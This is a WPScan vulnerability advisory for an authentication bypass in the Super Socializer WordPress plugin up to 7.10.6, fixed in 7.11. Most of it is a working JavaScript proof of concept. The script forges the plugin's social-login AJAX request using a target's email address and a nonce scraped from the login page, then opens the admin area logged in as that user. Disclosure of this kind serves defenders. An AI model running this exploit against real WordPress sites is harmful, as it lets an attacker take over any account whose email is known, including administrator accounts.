Super Socializer <= 7.10.6 - Authentication Bypass

Sign up to our free email alerts service for instant vulnerability notifications!

Description
You can log in to the site with any user if you know the user's email address.
Proof of Concept
// Steps:
// Fill this 3 variable
var url = 'http://my-site.com/wordpress/', //website url. Closing slash required
  email = 'john.doe@my-site.com', //The admin email address to exploit
  nonce = 'e86377d05a'; // View the source of the login page: http://my-site.com/wordpress/wp-login.php and search for `security`. copy here the nonce value Ex.: var the_champ_sl_ajax_token = {"ajax_url":"http:\/\/my-site.com\/wordpress\/wp-admin\/admin-ajax.php","security":"e86377d05a"};
// Click on Run in JsFiddle and then click on the Exploit button. It will open a window which first log you in to the user with the given email address then loads the admin area and you will be logged in.

function exploit() {
  var param = {
    action: 'the_champ_user_auth',
    security: nonce,
    'profileData[id]': 'a',
    'profileData[link]': 'a',
    'profileData[name]': 'a',
    'profileData[email]': email,
    'profileData[first_name]': 'a',
    'profileData[last_name]': 'a',
    provider: 'facebook',
    redirectionUrl: encodeURI(url)
  };
  OpenWindowWithPost(url + "wp-admin/admin-ajax.php",
    "width=700,height=345,left=100,top=100,resizable=yes,scrollbars=yes", "exploit", param);


  setTimeout(function() {
    window.open(url + "wp-admin/", 'exploit');
  }, 2000);
}

$(document).ready(function() {
  $('button').on('click', exploit);
});


function OpenWindowWithPost(url, windowoption, name, params) {
  var form = document.createElement("form");
  form.setAttribute("method", "post");
  form.setAttribute("action", url);
  form.setAttribute("target", name);

  for (var i in params) {
    if (params.hasOwnProperty(i)) {
      var input = document.createElement('input');
      input.type = 'hidden';
      input.name = i;
      input.value = params[i];
      form.appendChild(input);
    }
  }

  document.body.appendChild(form);

  var wnd = window.open("", name, windowoption);

  form.submit();

  document.body.removeChild(form);

  return wnd;
}

Affects Plugin

fixed in version 7.11

References

URL https://jsfiddle.net/5jh37uet/
URL https://plugins.trac.wordpress.org/changeset/1832860/super-socializer

Classification

Type AUTHBYPASS
OWASP Top 10 A2: Broken Authentication and Session Management
CWE CWE-287

Miscellaneous

Views 327
Verified No
WPVDB ID 9043

Timeline

Publicly Published 2018-03-03 (5 months ago)
Added 2018-03-15 (4 months ago)
Last Updated 2018-03-15 (4 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.